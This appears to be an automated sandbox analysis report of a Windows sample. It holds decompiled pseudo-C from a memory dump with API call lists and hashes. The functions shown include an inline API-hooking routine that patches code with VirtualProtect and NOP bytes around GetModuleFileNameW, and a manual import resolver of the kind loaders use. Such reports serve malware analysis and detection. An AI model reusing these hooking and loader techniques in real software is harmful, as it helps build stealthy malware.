                                                                                                                        									_t184 = _t189;
                                                                                                                        									__eflags = _t184;
                                                                                                                        									if(_t184 == 0) {
                                                                                                                        										goto L52;
                                                                                                                        									}
                                                                                                                        									 *_t184 = 0xcccc;
                                                                                                                        									_t184 =  &(_t184[4]);
                                                                                                                        									goto L45;
                                                                                                                        								}
                                                                                                                        								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                        									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                        								}
                                                                                                                        								goto L52;
                                                                                                                        							}
                                                                                                                        							_t150 = 0xffffffe0;
                                                                                                                        							_t179 = _t150 % _t182;
                                                                                                                        							if(_t150 / _t182 < 2) {
                                                                                                                        								goto L28;
                                                                                                                        							}
                                                                                                                        							_t25 = _t182 + 8; // 0x8
                                                                                                                        							_t152 = _t182 + _t25;
                                                                                                                        							if(_t182 + _t25 > 0x400) {
                                                                                                                        								_t153 = E0040DFE9(0, _t179, _t182, _t152);
                                                                                                                        								__eflags = _t153;
                                                                                                                        								if(_t153 == 0) {
                                                                                                                        									L27:
                                                                                                                        									_v16 = _t153;
                                                                                                                        									goto L29;
                                                                                                                        								}
                                                                                                                        								 *_t153 = 0xdddd;
                                                                                                                        								L26:
                                                                                                                        								_t153 =  &(_t153[4]);
                                                                                                                        								goto L27;
                                                                                                                        							}
                                                                                                                        							E00419AF0(_t152);
                                                                                                                        							_t153 = _t189;
                                                                                                                        							if(_t153 == 0) {
                                                                                                                        								goto L27;
                                                                                                                        							}
                                                                                                                        							 *_t153 = 0xcccc;
                                                                                                                        							goto L26;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				_t178 = _a16;
                                                                                                                        				_t157 = _a12;
                                                                                                                        				while(1) {
                                                                                                                        					_t178 = _t178 - 1;
                                                                                                                        					if( *_t157 == 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t157 =  &(_t157[1]);
                                                                                                                        					if(_t178 != 0) {
                                                                                                                        						continue;
                                                                                                                        					}
                                                                                                                        					_t178 = _t178 | 0xffffffff;
                                                                                                                        					break;
                                                                                                                        				}
                                                                                                                        				_t160 = _a16 - _t178 - 1;
                                                                                                                        				if(_t160 < _a16) {
                                                                                                                        					_t160 = _t160 + 1;
                                                                                                                        				}
                                                                                                                        				_a16 = _t160;
                                                                                                                        				goto L13;
                                                                                                                        			}











































                                                                                                                        0x00418f58
                                                                                                                        0x00418f5f
                                                                                                                        0x00418f67
                                                                                                                        0x00418f6f
                                                                                                                        0x00418f75
                                                                                                                        0x00418f82
                                                                                                                        0x00418f8a
                                                                                                                        0x00418f94
                                                                                                                        0x00418f9a
                                                                                                                        0x00418f9d
                                                                                                                        0x00418f9f
                                                                                                                        0x00418f9f
                                                                                                                        0x00418f8c
                                                                                                                        0x00418f8c
                                                                                                                        0x00418f8c
                                                                                                                        0x00418f8a
                                                                                                                        0x00418fac
                                                                                                                        0x00418fd0
                                                                                                                        0x00418fd0
                                                                                                                        0x00418fd8
                                                                                                                        0x0041918a
                                                                                                                        0x0041918d
                                                                                                                        0x00419190
                                                                                                                        0x00419193
                                                                                                                        0x0041919a
                                                                                                                        0x0041919a
                                                                                                                        0x0041919d
                                                                                                                        0x004191a0
                                                                                                                        0x004191a7
                                                                                                                        0x004191a7
                                                                                                                        0x004191ad
                                                                                                                        0x004191b3
                                                                                                                        0x004191b6
                                                                                                                        0x004191b9
                                                                                                                        0x004191c2
                                                                                                                        0x004191c5
                                                                                                                        0x004192be
                                                                                                                        0x004192c0
                                                                                                                        0x004192c0
                                                                                                                        0x004192c3
                                                                                                                        0x004192c5
                                                                                                                        0x004192c8
                                                                                                                        0x004192cd
                                                                                                                        0x004192ce
                                                                                                                        0x004192d1
                                                                                                                        0x004192d3
                                                                                                                        0x004192d5
                                                                                                                        0x004192d8
                                                                                                                        0x004192da
                                                                                                                        0x004192db
                                                                                                                        0x004192e0
                                                                                                                        0x004192d8
                                                                                                                        0x004192e1
                                                                                                                        0x00000000
                                                                                                                        0x004192e1
                                                                                                                        0x004191d8
                                                                                                                        0x004191dd
                                                                                                                        0x004191e0
                                                                                                                        0x004191e3
                                                                                                                        0x004191e5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004191f9
                                                                                                                        0x004191fb
                                                                                                                        0x004191fe
                                                                                                                        0x00419200
                                                                                                                        0x00419209
                                                                                                                        0x00419248
                                                                                                                        0x00419248
                                                                                                                        0x00419248
                                                                                                                        0x0041924a
                                                                                                                        0x0041924a
                                                                                                                        0x0041924c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00419253
                                                                                                                        0x0041926b
                                                                                                                        0x0041926d
                                                                                                                        0x00419270
                                                                                                                        0x00419272
                                                                                                                        0x0041928e
                                                                                                                        0x00419290
                                                                                                                        0x00419298
                                                                                                                        0x0041929a
                                                                                                                        0x0041929a
                                                                                                                        0x00419274
                                                                                                                        0x00419274
                                                                                                                        0x00419274
                                                                                                                        0x0041929e
                                                                                                                        0x00000000
                                                                                                                        0x004192a3
                                                                                                                        0x0041920b
                                                                                                                        0x0041920e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00419210
                                                                                                                        0x00419213
                                                                                                                        0x00419218
                                                                                                                        0x00419231
                                                                                                                        0x00419237
                                                                                                                        0x00419239
                                                                                                                        0x0041923b
                                                                                                                        0x00419241
                                                                                                                        0x00419241
                                                                                                                        0x00419241
                                                                                                                        0x00419244
                                                                                                                        0x00000000
                                                                                                                        0x00419244
                                                                                                                        0x0041921a
                                                                                                                        0x0041921f
                                                                                                                        0x00419221
                                                                                                                        0x00419223
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00419225
                                                                                                                        0x0041922b
                                                                                                                        0x00000000
                                                                                                                        0x0041922b
                                                                                                                        0x00419202
                                                                                                                        0x00419202
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00418fe6
                                                                                                                        0x00418fe9
                                                                                                                        0x004191bb
                                                                                                                        0x004191bb
                                                                                                                        0x004192e3
                                                                                                                        0x004192f4
                                                                                                                        0x004192f4
                                                                                                                        0x00418fef
                                                                                                                        0x00418ff5
                                                                                                                        0x00418ffc
                                                                                                                        0x00418ffc
                                                                                                                        0x00418fff
                                                                                                                        0x00419022
                                                                                                                        0x00419024
                                                                                                                        0x00419026
                                                                                                                        0x00000000
                                                                                                                        0x0041902c
                                                                                                                        0x0041902c
                                                                                                                        0x00419071
                                                                                                                        0x00419071
                                                                                                                        0x00419074
                                                                                                                        0x00419077
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00419090
                                                                                                                        0x00419179
                                                                                                                        0x0041917c
                                                                                                                        0x00419181
                                                                                                                        0x00000000
                                                                                                                        0x00419184
                                                                                                                        0x00419096
                                                                                                                        0x004190aa
                                                                                                                        0x004190ac
                                                                                                                        0x004190b1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004190be
                                                                                                                        0x004190e9
                                                                                                                        0x004190eb
                                                                                                                        0x00419132
                                                                                                                        0x00419132
                                                                                                                        0x00419132
                                                                                                                        0x00419134
                                                                                                                        0x00419134
                                                                                                                        0x00419136
                                                                                                                        0x00419146
                                                                                                                        0x0041914c
                                                                                                                        0x0041914e
                                                                                                                        0x00419150
                                                                                                                        0x00419151
                                                                                                                        0x00419152
                                                                                                                        0x00419155
                                                                                                                        0x0041915b
                                                                                                                        0x0041915e
                                                                                                                        0x00419157
                                                                                                                        0x00419157
                                                                                                                        0x00419158
                                                                                                                        0x00419158
                                                                                                                        0x0041916f
                                                                                                                        0x0041916f
                                                                                                                        0x00419173
                                                                                                                        0x00419178
                                                                                                                        0x00000000
                                                                                                                        0x00419136
                                                                                                                        0x004190f1
                                                                                                                        0x004190f2
                                                                                                                        0x004190f4
                                                                                                                        0x004190f7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004190f9
                                                                                                                        0x004190f9
                                                                                                                        0x004190fd
                                                                                                                        0x00419102
                                                                                                                        0x0041911b
                                                                                                                        0x00419121
                                                                                                                        0x00419123
                                                                                                                        0x00419125
                                                                                                                        0x0041912b
                                                                                                                        0x0041912b
                                                                                                                        0x0041912b
                                                                                                                        0x0041912e
                                                                                                                        0x00000000
                                                                                                                        0x0041912e
                                                                                                                        0x00419104
                                                                                                                        0x00419109
                                                                                                                        0x0041910b
                                                                                                                        0x0041910d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0041910f
                                                                                                                        0x00419115
                                                                                                                        0x00000000
                                                                                                                        0x00419115
                                                                                                                        0x004190c3
                                                                                                                        0x004190e2
                                                                                                                        0x004190e2
                                                                                                                        0x00000000
                                                                                                                        0x004190c3
                                                                                                                        0x00419032
                                                                                                                        0x00419033
                                                                                                                        0x00419038
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0041903a
                                                                                                                        0x0041903a
                                                                                                                        0x00419043
                                                                                                                        0x00419059
                                                                                                                        0x0041905f
                                                                                                                        0x00419061
                                                                                                                        0x0041906c
                                                                                                                        0x0041906c
                                                                                                                        0x00000000
                                                                                                                        0x0041906c
                                                                                                                        0x00419063
                                                                                                                        0x00419069
                                                                                                                        0x00419069
                                                                                                                        0x00000000
                                                                                                                        0x00419069
                                                                                                                        0x00419045
                                                                                                                        0x0041904a
                                                                                                                        0x0041904e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00419050
                                                                                                                        0x00000000
                                                                                                                        0x00419050
                                                                                                                        0x00419026
                                                                                                                        0x00418fd8
                                                                                                                        0x00418fae
                                                                                                                        0x00418fb1
                                                                                                                        0x00418fb4
                                                                                                                        0x00418fb4
                                                                                                                        0x00418fb7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00418fb9
                                                                                                                        0x00418fbc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00418fbe
                                                                                                                        0x00000000
                                                                                                                        0x00418fbe
                                                                                                                        0x00418fc6
                                                                                                                        0x00418fca
                                                                                                                        0x00418fcc
                                                                                                                        0x00418fcc
                                                                                                                        0x00418fcd
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 00418F82
                                                                                                                        • GetLastError.KERNEL32(?,00420F70,00000010), ref: 00418F94
                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 00419020
                                                                                                                        • _malloc.LIBCMT ref: 00419059
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00420F70,00000010), ref: 0041908C
                                                                                                                        • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,00420F70,00000010), ref: 004190A8
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 004190E2
                                                                                                                        • _malloc.LIBCMT ref: 0041911B
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00419146
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00419169
                                                                                                                        • __freea.LIBCMT ref: 00419173
                                                                                                                        • __freea.LIBCMT ref: 0041917C
                                                                                                                        • ___ansicp.LIBCMT ref: 004191AD
                                                                                                                        • ___convertcp.LIBCMT ref: 004191D8
                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 004191F9
                                                                                                                        • _malloc.LIBCMT ref: 00419231
                                                                                                                        • _memset.LIBCMT ref: 00419253
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041926B
                                                                                                                        • ___convertcp.LIBCMT ref: 00419289
                                                                                                                        • __freea.LIBCMT ref: 0041929E
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 004192B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3809854901-0
                                                                                                                        • Opcode ID: 9ec857312dc48b369f6b49b06491985e719d539030cbf376f21f299ec58edebf
                                                                                                                        • Instruction ID: cd74215ce49cf6b34db5a0ea1268125e3de14cb0b55a5a9190ba2128f9fa2f59
                                                                                                                        • Opcode Fuzzy Hash: 9ec857312dc48b369f6b49b06491985e719d539030cbf376f21f299ec58edebf
                                                                                                                        • Instruction Fuzzy Hash: E1B1BD7290011ABFDF219FA0CC948EF3BB6EB48314F14456BF915A2260D7398DE1DB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 75%
                                                                                                                        			E00401270(void* __ecx, void* __edx) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				void* _t38;
                                                                                                                        				void* _t39;
                                                                                                                        				intOrPtr _t44;
                                                                                                                        				void* _t62;
                                                                                                                        				long _t63;
                                                                                                                        				void* _t68;
                                                                                                                        				void* _t76;
                                                                                                                        				void* _t85;
                                                                                                                        				intOrPtr* _t86;
                                                                                                                        				void* _t87;
                                                                                                                        				void* _t89;
                                                                                                                        				intOrPtr _t90;
                                                                                                                        				intOrPtr* _t92;
                                                                                                                        				long _t93;
                                                                                                                        				void* _t97;
                                                                                                                        				void* _t98;
                                                                                                                        				void* _t99;
                                                                                                                        				void* _t100;
                                                                                                                        				void* _t103;
                                                                                                                        				void* _t109;
                                                                                                                        
                                                                                                                        				_t76 = __edx;
                                                                                                                        				_t68 = __ecx;
                                                                                                                        				_t87 =  *(_t97 + 0x14);
                                                                                                                        				_t85 = 0;
                                                                                                                        				 *((intOrPtr*)(_t97 + 8)) = 0;
                                                                                                                        				if(_t87 == 0 ||  *((intOrPtr*)(_t97 + 0x1c)) == 0 ||  *(_t97 + 0x20) == 0) {
                                                                                                                        					__eflags = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t62 = _t87;
                                                                                                                        					 *(_t97 + 0x18) = 0;
                                                                                                                        					 *(_t97 + 0x14) = 0;
                                                                                                                        					_t89 = _t87;
                                                                                                                        					if( *_t87 == 0xe9) {
                                                                                                                        						 *(_t97 + 0x18) = 5;
                                                                                                                        						_t89 =  *((intOrPtr*)(_t87 + 1)) + _t87;
                                                                                                                        						_t109 = _t89;
                                                                                                                        						 *(_t97 + 0x14) = 1;
                                                                                                                        					}
                                                                                                                        					do {
                                                                                                                        						_push(0);
                                                                                                                        						_push(_t62);
                                                                                                                        						_t38 = E00402F3C(_t68, _t76, _t85, _t87, _t109);
                                                                                                                        						_t85 = _t85 + _t38;
                                                                                                                        						_t62 = _t62 + _t38;
                                                                                                                        					} while (_t85 < 5);
                                                                                                                        					if( *(_t97 + 0x14) != 0) {
                                                                                                                        						 *(_t97 + 0x20) = 5;
                                                                                                                        						_t63 =  *(_t97 + 0x20);
                                                                                                                        					} else {
                                                                                                                        						_t11 = _t85 + 5; // 0x5
                                                                                                                        						_t63 = _t11;
                                                                                                                        						 *(_t97 + 0x20) = _t63;
                                                                                                                        					}
                                                                                                                        					_t39 = E0040DFE9(_t63, _t76, _t85, _t63);
                                                                                                                        					_t98 = _t97 + 4;
                                                                                                                        					 *( *(_t97 + 0x2c)) = _t39;
                                                                                                                        					if(_t39 != 0) {
                                                                                                                        						VirtualProtect(_t39, _t63, 0x40, _t98 + 0x10); // executed
                                                                                                                        						E0040E430(_t85,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x28)))), 0x90,  *((intOrPtr*)(_t98 + 0x20)));
                                                                                                                        						_t99 = _t98 + 0xc;
                                                                                                                        						__eflags =  *((intOrPtr*)(_t99 + 0x14));
                                                                                                                        						_push(_t85);
                                                                                                                        						_push(_t87);
                                                                                                                        						if( *((intOrPtr*)(_t99 + 0x14)) != 0) {
                                                                                                                        							_t86 =  *((intOrPtr*)(_t99 + 0x30));
                                                                                                                        							_push( *_t86);
                                                                                                                        							E0040E0C0(VirtualProtect, _t86, _t87);
                                                                                                                        							_t44 =  *_t86;
                                                                                                                        							_t100 = _t99 + 0xc;
                                                                                                                        							_t90 = _t89 - _t44;
                                                                                                                        							__eflags = _t90;
                                                                                                                        							 *((intOrPtr*)(_t44 + 1)) =  *((intOrPtr*)(_t99 + 0x24)) + _t90 - 5;
                                                                                                                        							VirtualProtect(_t87, 5, 0x40, _t100 + 0x10);
                                                                                                                        							 *_t87 = 0x90909090;
                                                                                                                        							 *((char*)(_t87 + 4)) = 0x90909090;
                                                                                                                        							E00401230( *((intOrPtr*)(_t100 + 0x24)), _t87);
                                                                                                                        							VirtualProtect(_t87, 5,  *(_t100 + 0x18), _t100 + 0x18);
                                                                                                                        							return 1;
                                                                                                                        						} else {
                                                                                                                        							_t92 =  *((intOrPtr*)(_t99 + 0x30));
                                                                                                                        							_push( *_t92);
                                                                                                                        							E0040E0C0(VirtualProtect, _t85, _t87);
                                                                                                                        							__eflags =  *_t92 + _t85;
                                                                                                                        							E00401230(_t87 + 5,  *_t92 + _t85);
                                                                                                                        							_t103 = _t99 + 0x14;
                                                                                                                        							_t23 = _t85 + 5; // 0x5
                                                                                                                        							_t93 = _t23;
                                                                                                                        							VirtualProtect(_t87, _t93, 0x40, _t103 + 0x10); // executed
                                                                                                                        							E0040E430(_t85, _t87, 0x90, _t85);
                                                                                                                        							E00401230( *((intOrPtr*)(_t103 + 0x30)), _t87);
                                                                                                                        							VirtualProtect(_t87, _t93,  *(_t103 + 0x24), _t103 + 0x24); // executed
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						return _t39;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}



























                                                                                                                        0x00401270
                                                                                                                        0x00401270
                                                                                                                        0x00401274
                                                                                                                        0x00401279
                                                                                                                        0x0040127b
                                                                                                                        0x00401281
                                                                                                                        0x00401402
                                                                                                                        0x00401408
                                                                                                                        0x0040129b
                                                                                                                        0x004012a0
                                                                                                                        0x004012a2
                                                                                                                        0x004012a6
                                                                                                                        0x004012aa
                                                                                                                        0x004012ac
                                                                                                                        0x004012b1
                                                                                                                        0x004012b9
                                                                                                                        0x004012b9
                                                                                                                        0x004012bb
                                                                                                                        0x004012bb
                                                                                                                        0x004012c3
                                                                                                                        0x004012c3
                                                                                                                        0x004012c5
                                                                                                                        0x004012c6
                                                                                                                        0x004012cb
                                                                                                                        0x004012cd
                                                                                                                        0x004012cf
                                                                                                                        0x004012d9
                                                                                                                        0x004012e4
                                                                                                                        0x004012ec
                                                                                                                        0x004012db
                                                                                                                        0x004012db
                                                                                                                        0x004012db
                                                                                                                        0x004012de
                                                                                                                        0x004012de
                                                                                                                        0x004012f1
                                                                                                                        0x004012fa
                                                                                                                        0x004012fd
                                                                                                                        0x00401301
                                                                                                                        0x0040131a
                                                                                                                        0x0040132d
                                                                                                                        0x00401332
                                                                                                                        0x00401335
                                                                                                                        0x0040133a
                                                                                                                        0x0040133b
                                                                                                                        0x0040133c
                                                                                                                        0x004013a3
                                                                                                                        0x004013a9
                                                                                                                        0x004013aa
                                                                                                                        0x004013af
                                                                                                                        0x004013b5
                                                                                                                        0x004013b8
                                                                                                                        0x004013b8
                                                                                                                        0x004013c8
                                                                                                                        0x004013cb
                                                                                                                        0x004013d2
                                                                                                                        0x004013d4
                                                                                                                        0x004013dd
                                                                                                                        0x004013f2
                                                                                                                        0x00401400
                                                                                                                        0x0040133e
                                                                                                                        0x0040133e
                                                                                                                        0x00401345
                                                                                                                        0x00401346
                                                                                                                        0x00401351
                                                                                                                        0x00401358
                                                                                                                        0x0040135d
                                                                                                                        0x00401367
                                                                                                                        0x00401367
                                                                                                                        0x0040136c
                                                                                                                        0x00401375
                                                                                                                        0x00401380
                                                                                                                        0x00401394
                                                                                                                        0x004013a2
                                                                                                                        0x004013a2
                                                                                                                        0x00401303
                                                                                                                        0x0040130a
                                                                                                                        0x0040130a
                                                                                                                        0x00401301

                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 004012F1
                                                                                                                        • VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00000000,GetModuleFileNameW,004011C0,004237C0), ref: 0040131A
                                                                                                                        • _memset.LIBCMT ref: 0040132D
                                                                                                                        • VirtualProtect.KERNEL32(?,00000005,00000040,?), ref: 0040136C
                                                                                                                        • _memset.LIBCMT ref: 00401375
                                                                                                                        • VirtualProtect.KERNEL32(?,00000005,?,?), ref: 00401394
                                                                                                                        • VirtualProtect.KERNEL32(?,00000005,00000040,?), ref: 004013CB
                                                                                                                        • VirtualProtect.KERNEL32(?,00000005,?,?), ref: 004013F2
                                                                                                                          • Part of subcall function 00401230: IsBadReadPtr.KERNEL32(?,00000001,?,?,76D26760,004013E2,?,?), ref: 00401240
                                                                                                                          • Part of subcall function 00401230: IsBadReadPtr.KERNEL32(?,00000004), ref: 0040124F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual$Read_memset$_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 169404485-0
                                                                                                                        • Opcode ID: 9654bc4f30739082c352b25aa023c39127d2627010b80ac06443884e484b5978
                                                                                                                        • Instruction ID: fb0cdb721b6fef07ebaa0484e151029a02cf396943db553e897e3e475b54f777
                                                                                                                        • Opcode Fuzzy Hash: 9654bc4f30739082c352b25aa023c39127d2627010b80ac06443884e484b5978
                                                                                                                        • Instruction Fuzzy Hash: 6A419271505301ABD310DF59DC81E6BB7E8FFC4708F04492EF584A7291E779EA098BAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E004053C0() {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				intOrPtr* _t28;
                                                                                                                        				intOrPtr _t32;
                                                                                                                        				struct HINSTANCE__* _t35;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        				void _t39;
                                                                                                                        				signed int _t40;
                                                                                                                        				void* _t42;
                                                                                                                        				CHAR* _t44;
                                                                                                                        				_Unknown_base(*)()* _t45;
                                                                                                                        				struct HINSTANCE__* _t47;
                                                                                                                        				void* _t52;
                                                                                                                        				signed int* _t53;
                                                                                                                        				void* _t56;
                                                                                                                        				signed int* _t60;
                                                                                                                        				intOrPtr _t62;
                                                                                                                        				void* _t63;
                                                                                                                        				signed int _t70;
                                                                                                                        
                                                                                                                        				_t52 =  *(_t63 + 0x14);
                                                                                                                        				_t2 = _t52 + 4; // 0xffff5085
                                                                                                                        				_t62 =  *_t2;
                                                                                                                        				_t28 =  *_t52 - 0xffffff80;
                                                                                                                        				if( *((intOrPtr*)(_t28 + 4)) <= 0) {
                                                                                                                        					return 1;
                                                                                                                        				} else {
                                                                                                                        					_t56 =  *_t28 + _t62;
                                                                                                                        					 *(_t63 + 0x18) = _t56;
                                                                                                                        					if(IsBadReadPtr(_t56, 0x14) != 0) {
                                                                                                                        						return 1;
                                                                                                                        					} else {
                                                                                                                        						while(1) {
                                                                                                                        							_t32 =  *((intOrPtr*)(_t56 + 0xc));
                                                                                                                        							if(_t32 == 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t35 = LoadLibraryA(_t32 + _t62); // executed
                                                                                                                        							_t47 = _t35;
                                                                                                                        							_t67 = _t47 - 0xffffffff;
                                                                                                                        							if(_t47 == 0xffffffff) {
                                                                                                                        								L17:
                                                                                                                        								__eflags = 0;
                                                                                                                        								return 0;
                                                                                                                        							} else {
                                                                                                                        								_t6 = _t52 + 0xc; // 0x52ffffff
                                                                                                                        								_t7 = _t52 + 8; // 0x48958bff
                                                                                                                        								_push(4 +  *_t6 * 4);
                                                                                                                        								_push( *_t7);
                                                                                                                        								_t38 = E0040EB37(_t47,  *_t7, _t52, _t56, _t67);
                                                                                                                        								_t63 = _t63 + 8;
                                                                                                                        								 *((intOrPtr*)(_t52 + 8)) = _t38;
                                                                                                                        								if(_t38 == 0) {
                                                                                                                        									goto L17;
                                                                                                                        								} else {
                                                                                                                        									_t11 = _t52 + 0xc; // 0x52ffffff
                                                                                                                        									 *(_t38 +  *_t11 * 4) = _t47;
                                                                                                                        									 *(_t52 + 0xc) =  *(_t52 + 0xc) + 1;
                                                                                                                        									_t39 =  *_t56;
                                                                                                                        									if(_t39 == 0) {
                                                                                                                        										_t53 =  *((intOrPtr*)(_t56 + 0x10)) + _t62;
                                                                                                                        										_t60 = _t53;
                                                                                                                        									} else {
                                                                                                                        										_t53 = _t39 + _t62;
                                                                                                                        										_t60 =  *((intOrPtr*)(_t56 + 0x10)) + _t62;
                                                                                                                        									}
                                                                                                                        									_t40 =  *_t53;
                                                                                                                        									_t70 = _t40;
                                                                                                                        									if(_t70 == 0) {
                                                                                                                        										L15:
                                                                                                                        										_t42 =  *(_t63 + 0x10) + 0x14;
                                                                                                                        										 *(_t63 + 0x18) = _t42;
                                                                                                                        										if(IsBadReadPtr(_t42, 0x14) != 0) {
                                                                                                                        											break;
                                                                                                                        										} else {
                                                                                                                        											_t52 =  *(_t63 + 0x18);
                                                                                                                        											_t56 =  *(_t63 + 0x10);
                                                                                                                        											continue;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										L10:
                                                                                                                        										L10:
                                                                                                                        										if(_t70 >= 0) {
                                                                                                                        											_t44 = _t40 + _t62 + 2;
                                                                                                                        										} else {
                                                                                                                        											_t44 = _t40 & 0x0000ffff;
                                                                                                                        										}
                                                                                                                        										_t45 = GetProcAddress(_t47, _t44);
                                                                                                                        										 *_t60 = _t45;
                                                                                                                        										if(_t45 == 0) {
                                                                                                                        											goto L17;
                                                                                                                        										}
                                                                                                                        										_t40 = _t53[1];
                                                                                                                        										_t53 =  &(_t53[1]);
                                                                                                                        										_t60 =  &(_t60[1]);
                                                                                                                        										if(_t40 != 0) {
                                                                                                                        											goto L10;
                                                                                                                        										} else {
                                                                                                                        											goto L15;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							goto L21;
                                                                                                                        						}
                                                                                                                        						return 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L21:
                                                                                                                        			}
























                                                                                                                        0x004053c4
                                                                                                                        0x004053ca
                                                                                                                        0x004053ca
                                                                                                                        0x004053cd
                                                                                                                        0x004053d9
                                                                                                                        0x004054c7
                                                                                                                        0x004053df
                                                                                                                        0x004053e2
                                                                                                                        0x004053e7
                                                                                                                        0x004053f3
                                                                                                                        0x004054c0
                                                                                                                        0x00405400
                                                                                                                        0x00405400
                                                                                                                        0x00405400
                                                                                                                        0x00405405
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040540e
                                                                                                                        0x00405414
                                                                                                                        0x00405416
                                                                                                                        0x00405419
                                                                                                                        0x004054b1
                                                                                                                        0x004054b4
                                                                                                                        0x004054b8
                                                                                                                        0x0040541f
                                                                                                                        0x0040541f
                                                                                                                        0x00405422
                                                                                                                        0x0040542c
                                                                                                                        0x0040542d
                                                                                                                        0x0040542e
                                                                                                                        0x00405433
                                                                                                                        0x00405436
                                                                                                                        0x0040543b
                                                                                                                        0x00000000
                                                                                                                        0x0040543d
                                                                                                                        0x0040543d
                                                                                                                        0x00405440
                                                                                                                        0x00405443
                                                                                                                        0x00405446
                                                                                                                        0x0040544a
                                                                                                                        0x00405459
                                                                                                                        0x0040545c
                                                                                                                        0x0040544c
                                                                                                                        0x0040544f
                                                                                                                        0x00405452
                                                                                                                        0x00405452
                                                                                                                        0x0040545e
                                                                                                                        0x00405460
                                                                                                                        0x00405462
                                                                                                                        0x0040548c
                                                                                                                        0x00405490
                                                                                                                        0x00405496
                                                                                                                        0x004054a2
                                                                                                                        0x00000000
                                                                                                                        0x004054a4
                                                                                                                        0x004054a4
                                                                                                                        0x004054a8
                                                                                                                        0x00000000
                                                                                                                        0x004054a8
                                                                                                                        0x00405464
                                                                                                                        0x00000000
                                                                                                                        0x00405464
                                                                                                                        0x00405464
                                                                                                                        0x0040546d
                                                                                                                        0x00405466
                                                                                                                        0x00405466
                                                                                                                        0x00405466
                                                                                                                        0x00405473
                                                                                                                        0x00405479
                                                                                                                        0x0040547d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040547f
                                                                                                                        0x00405482
                                                                                                                        0x00405485
                                                                                                                        0x0040548a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
